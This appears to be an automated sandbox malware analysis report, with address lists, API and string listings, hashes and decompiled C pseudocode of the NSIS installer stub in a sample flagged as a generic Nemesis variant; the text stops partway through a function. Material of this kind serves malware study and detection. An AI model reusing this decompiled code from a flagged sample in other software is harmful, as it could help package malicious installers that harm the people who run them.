0x004037bd
0x004037c4
0x004037c6
0x004037c7
0x004037d1
0x004037d8
0x004037da
0x004037dc
0x004037dc
0x004037ef
0x004037f1
0x004038eb
0x004038eb
0x004038ee
0x004038f1
0x00000000
0x00000000
0x004037fb
0x004037fc
0x004037ff
0x00403808
0x00403808
0x0040380b
0x0040380e
0x00403811
0x00403814
0x00403814
0x00403814
0x00403815
0x00403819
0x004038d9
0x004038e2
0x004038e4
0x004038e7
0x004038ea
0x004038ea
0x004038ea
0x00000000
0x0040381f
0x00403820
0x00403821
0x00403825
0x0040383f
0x00403846
0x00403859
0x0040385a
0x0040386f
0x00403874
0x00403876
0x00403878
0x00403894
0x0040389b
0x004038ae
0x004038af
0x004038c4
0x004038ca
0x004038cc
0x004038ce
0x004038d6
0x004038d8
0x00000000
0x004038d8
0x004038d2
0x004038d4
0x004038f9
0x004038fd
0x00403906
0x0040390b
0x00403911
0x0040391c
0x0040391e
0x00403923
0x00403925
0x0040397d
0x00403982
0x0040398b
0x00403992
0x00403995
0x00403b6c
0x00403b6c
0x00403b71
0x00403b7a
0x00403b97
0x00403c0f
0x00403c0f
0x00403c17
0x00403c19
0x00403c19
0x00403c1f
0x00403c1f
0x00403bae
0x00403bba
0x00403bcb
0x00403bd2
0x00403bd9
0x00403bd9
0x00403be1
0x00403bed
0x00403bfb
0x00403c06
0x00000000
0x00000000
0x00000000
0x00403bef
0x00403bef
0x00403bf0
0x00403bf2
0x00403bf3
0x00403bf4
0x00403bf9
0x00403c08
0x00403c0a
0x00000000
0x00403c0a
0x00000000
0x00403bf9
0x00403bed
0x00403b84
0x00403b8b
0x00403b8b
0x004039a1
0x00403a48
0x00403a48
0x00403a54
0x00000000
0x00403a54
0x004039b2
0x004039ba
0x00403a0c
0x00403a0c
0x00403a12
0x00403a19
0x00403a67
0x00403a69
0x00403a6e
0x00403a70
0x00403a78
0x00403a78
0x00403a83
0x00403a88
0x00403a8f
0x00403a95
0x00403a97
0x00403b6a
0x00403b6a
0x00403b6a
0x00000000
0x00403a9d
0x00403a9d
0x00403a9f
0x00403aa0
0x00403aa9
0x00403aa2
0x00403aa2
0x00403aa2
0x00403aaf
0x00403ab7
0x00403abe
0x00403ac6
0x00403ac6
0x00403ad3
0x00403adf
0x00403ae9
0x00403ae9
0x00403aeb
0x00403af2
0x00403afc
0x00403b08
0x00403b0e
0x00403b14
0x00403b17
0x00403b21
0x00403b27
0x00403b29
0x00403b2d
0x00403b3e
0x00403b44
0x00403b49
0x00403b4b
0x00403b4e
0x00403b54
0x00403b54
0x00403b4b
0x00403b29
0x00403b57
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b5e
0x00403b65
0x00000000
0x00403b65
0x00403a97
0x00403a1b
0x00403a1e
0x00403a22
0x00403a27
0x00403a29
0x00000000
0x00000000
0x00403a35
0x00403a40
0x00403a45
0x00000000
0x00403a45
0x004039c3
0x004039db
0x004039ec
0x004039ed
0x004039f1
0x004039f3
0x00403a01
0x00403a08
0x00000000
0x00000000
0x00000000
0x00403a08
0x00403a0a
0x00000000
0x00403a0a
0x0040392d
0x00403939
0x0040393e
0x00403943
0x00403945
0x00000000
0x00000000
0x0040394d
0x00403955
0x00403966
0x0040396e
0x00403970
0x00403975
0x00403977
0x00000000
0x00000000
0x00000000
0x00403977
0x00000000
0x004038d4
0x0040387d
0x0040387f
0x00000000
0x00000000
0x00403881
0x00403885
0x00403889
0x00403890
0x00403890
0x00403890
0x00403890
0x00000000
0x00403890
0x0040388b
0x0040388e
0x00000000
0x00000000
0x00000000
0x0040388e
0x00403827
0x0040382b
0x0040382e
0x00403835
0x00403835
0x00000000
0x00403835
0x00403830
0x00403833
0x00000000
0x00000000
0x00000000
0x00403833
0x00000000
0x00000000
0x00000000
0x00403801
0x00403801
0x00403802
0x00403803
0x00403803
0x00000000
0x00403801
0x00000000

APIs

SetErrorMode.KERNELBASE(00008001), ref: 00403663
GetVersionExW.KERNEL32(?), ref: 0040368C
GetVersionExW.KERNEL32(0000011C), ref: 004036A3
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
#17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
OleInitialize.OLE32(00000000), ref: 0040377D
SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000020,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000000), ref: 004037E9
GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
DeleteFileW.KERNELBASE(1033), ref: 00403982
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78

Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C

lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" ,00000000,?), ref: 00403A8F
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe,00420F08,00000001), ref: 00403B21
CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
OleUninitialize.OLE32(?), ref: 00403B71
ExitProcess.KERNEL32 ref: 00403B8B
GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
ExitProcess.KERNEL32 ref: 00403C1F

Strings

SeShutdownPrivilege, xrefs: 00403BB4
"C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" , xrefs: 004037B6, 004037BC, 004037D1, 004039A8, 004039B4, 00403A02, 00403A0C
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403659
C:\Users\user\AppData\Local\Temp, xrefs: 00403901, 00403A30, 00403AB7, 00403AC1
1033, xrefs: 0040397D
TMP, xrefs: 00403969
\Temp, xrefs: 00403933
NSIS Error, xrefs: 004037A1
UXTHEME, xrefs: 0040372E, 00403733, 00403739
C:\Users\user\AppData\Local\Temp\, xrefs: 00403911, 00403916, 0040392C, 00403938, 00403947, 00403954, 00403960, 00403968, 00403A66, 00403A77, 00403A82, 00403A8E, 00403A9F, 00403AAE, 00403B64
~nsu, xrefs: 00403A61
TEMP, xrefs: 00403961
.tmp, xrefs: 00403A7D
Low, xrefs: 0040394F
C:\Users\user\AppData\Local\Temp, xrefs: 00403A3B
C:\Users\user\Desktop, xrefs: 00403A88, 00403A8D, 00403AC0
C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, xrefs: 00403B1C
Error launching installer, xrefs: 00403A12

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: lstrcat$FileProcess$DirectoryExit$CurrentDeleteEnvironmentPathTempTokenVariableVersionWindows$AdjustCharCloseCommandCopyCreateErrorHandleInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesUninitializeValuelstrcmpilstrlen
String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3859024572-1640577064
Opcode ID: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction ID: d56582c8b11bee4b9d4e83ad1f604629a9588d533935b381636b20c84fba3529
Opcode Fuzzy Hash: e0a8c6016783217a32738e87f4e0326041da0509f66f4411adb9540052cd23fd
Instruction Fuzzy Hash: D4E1F471A00214AADB20AFB58D45A6E3EB8EB05709F50847FF945B32D1DB7C8A41CB6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405809 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x429244;
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
								_v60 = _t156;
								_v48 = 0x423748;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x42922c == _t156) {
							ShowWindow( *0x42a268, 8);
							if( *0x42a2ec == _t156) {
								_t119 =  *0x422720; // 0x59d41c
								E004056CA( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E0040459D(_t171);
							goto L25;
						}
						 *0x421f18 = 2;
						E0040459D(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E0040462B(_a8, _a12, _a16);
						}
						ShowWindow( *0x429230, _t156);
						ShowWindow(_t169, 8);
						E004045F9(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a270;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x429230 = GetDlgItem(_a4, 0x403);
				 *0x429228 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x429244 = _t134;
				_v8 = _t134;
				E004045F9( *0x429230);
				 *0x429234 = E00404F52(4);
				 *0x42924c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004045C4(_a4);
				if(( *0x42a278 & 0x00000003) != 0) {
					ShowWindow( *0x429230, _t156);
					if(( *0x42a278 & 0x00000002) != 0) {
						 *0x429230 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E004045F9( *0x429228);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a278 & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x00405811
0x00405817
0x00405821
0x00405824
0x004059ba
0x004059d7
0x004059de
0x004059de
0x004059f1
0x00405a0f
0x00405a11
0x00405a19
0x00405a6f
0x00405a73
0x00000000
0x00000000
0x00405a75
0x00405a7b
0x00000000
0x00000000
0x00405a85
0x00405a8d
0x00405a90
0x00405b92
0x00000000
0x00405b92
0x00405a9f
0x00405aaa
0x00405ab3
0x00405abe
0x00405ac1
0x00405aca
0x00405ad0
0x00405ad3
0x00405ad3
0x00405aeb
0x00405af4
0x00405af7
0x00405afe
0x00405b05
0x00405b0d
0x00405b0d
0x00405b24
0x00405b24
0x00405b2b
0x00405b31
0x00405b3d
0x00405b44
0x00405b4d
0x00405b4f
0x00405b52
0x00405b61
0x00405b64
0x00405b6a
0x00405b6b
0x00405b71
0x00405b72
0x00405b73
0x00405b7b
0x00405b86
0x00405b8c
0x00405b8c
0x00000000
0x00405aeb
0x00405a21
0x00405a51
0x00405a59
0x00405a5b
0x00405a64
0x00405a64
0x00405a6a
0x00000000
0x00405a6a
0x00405a25
0x00405a2f
0x00000000
0x004059f3
0x004059f9
0x00405a34
0x00000000
0x00405a3d
0x00405a02
0x00405a07
0x00405a0a
0x00000000
0x00405a0a
0x004059f1
0x0040582a
0x0040582e
0x00405836
0x0040583a
0x0040583d
0x00405840
0x00405843
0x00405846
0x00405847
0x00405848
0x00405861
0x00405864
0x0040586e
0x0040587d
0x00405885
0x0040588d
0x00405892
0x00405895
0x004058a1
0x004058aa
0x004058b3
0x004058d5
0x004058db
0x004058ec
0x004058f1
0x004058ff
0x0040590d
0x0040590d
0x00405912
0x00405920
0x00405920
0x00405925
0x00405928
0x0040592d
0x00405939
0x00405942
0x0040594f
0x0040595e
0x00405951
0x00405956
0x00405956
0x0040596a
0x0040596a
0x0040597e
0x00405987
0x00405990
0x004059a0
0x004059ac
0x004059ac
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405867
GetDlgItem.USER32(?,000003EE), ref: 00405876
GetClientRect.USER32(?,?), ref: 004058B3
GetSystemMetrics.USER32(00000002), ref: 004058BA
SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
ShowWindow.USER32(?,00000008), ref: 00405956
GetDlgItem.USER32(?,000003EC), ref: 00405977
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
GetDlgItem.USER32(?,000003F8), ref: 00405885

Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607

GetDlgItem.USER32(?,000003EC), ref: 004059C9
CreateThread.KERNEL32(00000000,00000000,Function_0000579D,00000000), ref: 004059D7
CloseHandle.KERNELBASE(00000000), ref: 004059DE
ShowWindow.USER32(00000000), ref: 00405A02
ShowWindow.USER32(?,00000008), ref: 00405A07
ShowWindow.USER32(00000008), ref: 00405A51
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
CreatePopupMenu.USER32 ref: 00405A96
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405AAA
GetWindowRect.USER32(?,?), ref: 00405ACA
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
OpenClipboard.USER32(00000000), ref: 00405B2B
EmptyClipboard.USER32 ref: 00405B31
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
GlobalLock.KERNEL32(00000000), ref: 00405B47
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
CloseClipboard.USER32 ref: 00405B8C

Strings

H7B, xrefs: 00405AF7
{, xrefs: 00405A6F

Memory Dump Source

Source File: 00000000.00000002.1921543420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1921507308.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921611621.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921798150.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921834427.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921872103.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921924152.0000000000451000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1921963803.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: H7B${
API String ID: 590372296-2256286769
Opcode ID: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
Opcode Fuzzy Hash: acb4607de909606c36dfaba2b406014313c5fa90e55702556e162a5684d31028
Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 74251BFF Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E74251BFF() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t332 = 0;
				_v52 = 0;
				_v44 = 0;
				_t208 = E742512BB();
				_v24 = _t208;
				_v28 = _t208;
				_v48 = E742512BB();
				_t321 = E742512E3();
				_v56 = _t321;
				_v12 = _t321;
				while(1) {
					_t211 = _v32;
					_v60 = _t211;
					if(_t211 != _t283 && _t332 == _t283) {
						break;
					}
					_t286 =  *_t321 & 0x0000ffff;
					_t213 = _t286 - _t283;
					if(_t213 == 0) {
						_t37 =  &_v32;
						 *_t37 = _v32 | 0xffffffff;
						__eflags =  *_t37;
						L20:
						_t215 = _v60 - _t283;
						if(_t215 == 0) {
							__eflags = _t332 - _t283;
							 *_v28 = _t283;
							if(_t332 == _t283) {
								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
								_t332 = _t255;
								 *(_t332 + 0x1010) = _t283;
								 *(_t332 + 0x1014) = _t283;
							}
							_t287 = _v36;
							_t47 = _t332 + 8; // 0x8
							_t217 = _t47;
							_t48 = _t332 + 0x808; // 0x808
							_t322 = _t48;
							 *_t332 = _t287;
							_t288 = _t287 - _t283;
							__eflags = _t288;
							 *_t217 = _t283;
							 *_t322 = _t283;
							 *(_t332 + 0x1008) = _t283;
							 *(_t332 + 0x100c) = _t283;
							 *(_t332 + 4) = _t283;
							if(_t288 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L42;
								}
								_t328 = 0;
								GlobalFree(_t332);
								_t332 = E742513B1(_v24);
								__eflags = _t332 - _t283;
								if(_t332 == _t283) {
									goto L42;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t249 =  *(_t332 + 0x1ca0);
									__eflags = _t249 - _t283;
									if(_t249 == _t283) {
										break;
									}
									_t328 = _t332;
									_t332 = _t249;
									__eflags = _t332 - _t283;
									if(_t332 != _t283) {
										continue;
									}
									break;
								}
								__eflags = _t328 - _t283;
								if(_t328 != _t283) {
									 *(_t328 + 0x1ca0) = _t283;
								}
								_t250 =  *(_t332 + 0x1010);
								__eflags = _t250 & 0x00000008;
								if((_t250 & 0x00000008) == 0) {
									_t251 = _t250 | 0x00000002;
									__eflags = _t251;
									 *(_t332 + 0x1010) = _t251;
								} else {
									_t332 = E7425162F(_t332);
									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
								}
								goto L42;
							} else {
								_t300 = _t288 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									L31:
									lstrcpyW(_t217, _v48);
									L32:
									lstrcpyW(_t322, _v24);
									goto L42;
								}
								_t301 = _t300 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									goto L32;
								}
								__eflags = _t301 != 1;
								if(_t301 != 1) {
									goto L42;
								}
								goto L31;
							}
						} else {
							if(_t215 == 1) {
								_t257 = _v16;
								if(_v40 == _t283) {
									_t257 = _t257 - 1;
								}
								 *(_t332 + 0x1014) = _t257;
							}
							L42:
							_v12 = _v12 + 2;
							_v28 = _v24;
							L59:
							if(_v32 != 0xffffffff) {
								_t321 = _v12;
								continue;
							}
							break;
						}
					}
					_t258 = _t213 - 0x23;
					if(_t258 == 0) {
						__eflags = _t321 - _v56;
						if(_t321 <= _v56) {
							L17:
							__eflags = _v44 - _t283;
							if(_v44 != _t283) {
								L43:
								_t260 = _v32 - _t283;
								__eflags = _t260;
								if(_t260 == 0) {
									_t261 = _t286;
									while(1) {
										__eflags = _t261 - 0x22;
										if(_t261 != 0x22) {
											break;
										}
										_t321 =  &(_t321[1]);
										__eflags = _v44 - _t283;
										_v12 = _t321;
										if(_v44 == _t283) {
											_v44 = 1;
											L162:
											_v28 =  &(_v28[0]);
											 *_v28 =  *_t321;
											L58:
											_t331 =  &(_t321[1]);
											__eflags = _t331;
											_v12 = _t331;
											goto L59;
										}
										_t261 =  *_t321 & 0x0000ffff;
										_v44 = _t283;
									}
									__eflags = _t261 - 0x2a;
									if(_t261 == 0x2a) {
										_v36 = 2;
										L57:
										_t321 = _v12;
										_v28 = _v24;
										_t283 = 0;
										__eflags = 0;
										goto L58;
									}
									__eflags = _t261 - 0x2d;
									if(_t261 == 0x2d) {
										L151:
										_t304 =  *_t321;
										__eflags = _t304 - 0x2d;
										if(_t304 != 0x2d) {
											L154:
											_t264 =  &(_t321[1]);
											__eflags =  *_t264 - 0x3a;
											if( *_t264 != 0x3a) {
												goto L162;
											}
											__eflags = _t304 - 0x2d;
											if(_t304 == 0x2d) {
												goto L162;
											}
											_v36 = 1;
											L157:
											_v12 = _t264;
											__eflags = _v28 - _v24;
											if(_v28 <= _v24) {
												 *_v48 = _t283;
											} else {
												 *_v28 = _t283;
												lstrcpyW(_v48, _v24);
											}
											goto L57;
										}
										_t264 =  &(_t321[1]);
										__eflags =  *_t264 - 0x3e;
										if( *_t264 != 0x3e) {
											goto L154;
										}
										_v36 = 3;
										goto L157;
									}
									__eflags = _t261 - 0x3a;
									if(_t261 != 0x3a) {
										goto L162;
									}
									goto L151;
								}
								_t269 = _t260 - 1;
								__eflags = _t269;
								if(_t269 == 0) {
									L80:
									_t305 = _t286 + 0xffffffde;
									__eflags = _t305 - 0x55;
									if(_t305 > 0x55) {
										goto L57;
									}
									switch( *((intOrPtr*)(( *(_t305 + 0x742523e8) & 0x000000ff) * 4 +  &M7425235C))) {
										case 0:
											__ecx = _v24;
											__edi = _v12;
											while(1) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												L131:
												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
												if( *((intOrPtr*)(__edi + 2)) != __dx) {
													L136:
													 *__ecx =  *__ecx & 0x00000000;
													__eax = E742512CC(_v24);
													__ebx = __eax;
													goto L97;
												}
												L132:
												__eflags = __ax;
												if(__ax == 0) {
													goto L136;
												}
												__eflags = __ax - __dx;
												if(__ax == __dx) {
													__edi = __edi + 1;
													__edi = __edi + 1;
													__eflags = __edi;
												}
												__ax =  *__edi;
												 *__ecx =  *__edi;
												__ecx = __ecx + 1;
												__ecx = __ecx + 1;
												__edi = __edi + 1;
												__edi = __edi + 1;
												_v12 = __edi;
												__ax =  *__edi;
												__eflags = __ax - __dx;
												if(__ax != __dx) {
													goto L132;
												}
												goto L131;
											}
										case 1:
											_v8 = 1;
											goto L57;
